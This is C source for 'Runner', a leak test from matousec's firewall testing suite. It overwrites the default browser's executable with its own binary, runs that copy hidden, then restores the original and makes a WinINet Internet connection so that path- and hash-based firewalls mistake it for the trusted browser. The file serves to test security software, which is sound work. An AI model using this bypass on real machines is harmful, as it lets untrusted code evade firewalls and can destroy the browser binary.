/*

 Security Software Testing Suite - Runner (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * The original idea by www.matousec.com, Different Internet Experience Ltd.


 Method description:

   * Find and backup the default browser's excutable.

   * Replace the original with a copy of Runner's executable.

   * Run the copy. When the copy is executed, it replaces its own executable
     with the original browser's executable from the backup and then it attempts
     to access the Internet. Some systems that implement per-process security
     compares the offending process' executable path with trusted processes' paths
     in their database. If a match is found they count a hash of on disk image
     of the offending process and compare it to the database value of matching entry.
     If the hashes are equal they assume that the trusted process attempts to access
     the Internet.


 Known issues and warnings:

   * Using this test may delete the default browser's main executable.

*/


#include <windows.h>
#include <stdio.h>
#include <wininet.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;
  char *err_prefix=COM_ERR_STANDARD_PREFIX;

  char module[MAX_PATH],exename[MAX_PATH];
  if (!com_get_module_name(NULL,module,sizeof(module),&err_inf)
   || !com_get_module_image_name(NULL,exename,sizeof(exename),&err_inf))
  {
    com_err_print(&err_inf,COM_ERR_STANDARD_PREFIX);
    return 1;
  }

  if (!stricmp(exename,"runner.exe"))
    if (!com_console_init_winmain("Runner","runner",lpCmdLine,&conf,COM_TEST_TYPE_RUNNER))
      return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll","shell32.dll"};
  if (!com_hook_load_libraries(used_dlls,3)) return 1;


  int res=FALSE;
  char tmppath[MAX_PATH],browsbak[MAX_PATH],runner[MAX_PATH],defbrows[MAX_PATH];


  if (!com_get_default_browser_path(defbrows,MAX_PATH,&err_inf))
  {
    com_err_print(&err_inf,COM_ERR_STANDARD_PREFIX);
    printf(COM_MSG_TEST_FAILED);
    return 1;
  }

  lstrcpynA(tmppath,defbrows,sizeof(tmppath));
  char *slash=strrchr(tmppath,'\\');
  if (*slash) *slash='\0';
  else tmppath[0]='\0';

  snprintf(browsbak,sizeof(browsbak),"%s\\browser.bak",tmppath);
  browsbak[MAX_PATH-1]='\0';

  snprintf(runner,sizeof(runner),"%s\\runner",tmppath);
  runner[MAX_PATH-1]='\0';

  PCOM_MAPPING map=&conf.map;

  if (!stricmp(exename,"runner.exe"))
  {
    if (com_verbosity_get()) printf("Default browser's image path = \"%s\".\n",defbrows);

    if (com_mapping_server_create(map,COM_MAP_DEFAULT_DATA_SIZE_MAX,"Runner",&conf,sizeof(conf),&err_inf))
    {
      if (MoveFileEx(defbrows,browsbak,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
      {
        if (com_verbosity_get()) printf("File \"%s\" moved to \"%s\".\n",defbrows,browsbak);

        if (CopyFile(module,defbrows,FALSE))
        {
          if (com_verbosity_get()) printf("File \"%s\" copied to \"%s\".\n",module,browsbak);

          SHELLEXECUTEINFO sei;
          memset(&sei,0,sizeof(sei));
          sei.cbSize=sizeof(sei);
          sei.fMask=SEE_MASK_FLAG_NO_UI | SEE_MASK_NOCLOSEPROCESS;
          sei.lpVerb="open";
          sei.lpFile=defbrows;
          sei.nShow=SW_HIDE;

          printf("Initialization succeeded.\nRunning child processes ...\n");

          if (ShellExecuteEx(&sei))
          {
            if (com_verbosity_get()) printf("Helper process is running, waiting for data...\n");
            HANDLE handles[2]={map->event,sei.hProcess};
            DWORD wres=WaitForMultipleObjects(2,handles,FALSE,20000);
            switch (wres)
            {
              case WAIT_OBJECT_0:
              {
                if (map->data->error.occurred)
                {
                  err_prefix="\nHELPER PROCESS ERROR: ";
                  memcpy(&err_inf,&map->data->error,sizeof(err_inf));
                } else res=com_find_pattern_and_print_data(map->data->buffer,sizeof(map->data->buffer),&conf,&err_inf);

                break;
              }

              case WAIT_OBJECT_0+1:
                com_err_set_nc(&err_inf,"Helper process terminated.\n");
                break;

              case WAIT_TIMEOUT:
                com_err_set_nc(&err_inf,"Waiting timed out.\n");
                break;

              default:
                if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
                com_err_set(&err_inf,"Unknown error occurred, WaitForMultipleObjects returned %ld.\n",wres);
            }

            CloseHandle(sei.hProcess);
          } else com_err_set(&err_inf,"Unable to run \"%s\" using ShellExecuteEx.\n",defbrows);
        } else com_err_set(&err_inf,"Unable to copy file \"%s\" to \"%s\".\n",module,defbrows);
      } else com_err_set(&err_inf,"Unable to move file \"%s\" to \"%s\".\n",defbrows,browsbak);

      com_mapping_close(map);
    }

    return com_end_pref(res,&err_inf,&conf,err_prefix);
  }

  Sleep(5000);

  COM_MAPPING mapl;
  if (com_mapping_client_open(&mapl,COM_MAP_DEFAULT_DATA_SIZE_MAX,"Runner",&conf,sizeof(conf),&err_inf))
  {
    PCOM_DATA data=mapl.data;
    PCOM_ERROR err_infp=&data->error;
    if (MoveFileEx(module,runner,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
    {
      if (MoveFileEx(browsbak,module,MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH))
      {
        res=com_attempt_wininet(data->buffer,sizeof(data->buffer),&conf,err_infp);
      } else com_err_set(err_infp,"Unable to move file (2) \"%s\" to \"%s\".\n",browsbak,module);
    } else com_err_set(err_infp,"Unable to move file (1) \"%s\" to \"%s\".\n",module,runner);

    SetEvent(mapl.event);
    com_mapping_close(&mapl);
  }

  return (res ? 0 : 1);
}
